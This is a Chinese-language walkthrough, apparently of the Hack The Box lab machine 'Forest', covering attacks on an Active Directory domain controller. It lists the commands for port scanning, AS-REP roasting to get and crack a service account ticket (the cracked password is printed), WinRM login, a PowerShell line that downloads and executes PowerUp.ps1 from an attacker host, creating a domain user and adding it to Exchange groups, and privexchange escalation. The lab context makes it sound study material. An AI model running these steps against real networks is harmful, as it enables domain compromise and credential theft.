信息收集
端口扫描
1 | $ nmap -sC -sV -p53,88,135,139,445,464,593,636,3268,3269,5985,9389,47001,49664,49665,49666,49670,49676,49677,49684,49695,49714 --script=vuln -oA scan/Forest-vuln 10.10.10.161 |
Namp发现开发非常多的msrpc服务,还有ldap等,端口太多一时无法下手,先从SMB协议入手,找一下共享上的问题。
smb检查
1 | $ enum4linux 10.10.10.161 |
发现该机器位于域内发现两个域HTB、Builtin、存在Administrator、Guest、krbtgt、sebastien、lucinda、svc-alfresco、andy、mark、santi用户、sebastien,结合ldapuserenum.py查询发现用户均存在
尝试ldapdomaindump,失败
在forume张找到tips: Try to use impacket G********S.py to get the hash.
,查看impacket中匹配的工具:
GetADUsers.py、GetNPUsers.py、GetUserSPNs.py,找到可用工具GetNPUsers.py:
1 | $ GetNPUsers.py HTB/ -no-pass -usersfile users.txt -dc-ip 10.10.10.161 |
找到sac-alfresco用户的TGT凭证。GetNPUsers.py
将尝试为那些设置了属性“不需要Kerberos
预身份验证”(UF_DONT_REQUIRE_PREAUTH
)的用户列出并获取TGT
。 对于具有这种配置的那些用户,将生成John The Ripper
输出,可直接通过john进行破解。
crack TGT
1 | # Rubues破解 |
拿到用户名密码:HTB/svc-alfresco s3rvice。
user:svc-alfresco
通过smbmap查看可以访问的共享信息
1 | owef@owefsad:~$ smbmap -u 'svc-alfresco' -p 's3rvice' -d HTB -H 10.10.10.161 |
通过smbclient查看可以具体的文件信息
1 | $ smbclient.py HTB/svc-alfresco@10.10.10.161/SYSVOl |
通过evil-winrm登陆47001端口,获取user.txt
1 | $ evil-winrm -i 10.10.10.161 -u 'svc-alfresco' |
PowereUp尝试提权
1 | IEX (New-Object Net.WebClient).DownloadString("http://10.10.15.46/PowerUp.ps1") |
//10.10.10.161/SYSVOL
Exchange Windows Permissions
- HTB\Exchange
net user owef Forest.htb1 /add /domain
net group “Exchange Windows Permissions” owef /add
net group “Exchange Windows Permissions” svc-alfresco /add
net group “domain controllers” /domain
1 | *Evil-WinRM* PS C:\Users\svc-alfresco\Documents> net group |
1 | python privexchange.py -ah 10.10.10.161 10.10.10.161 -u svc-alfresco -d HTB |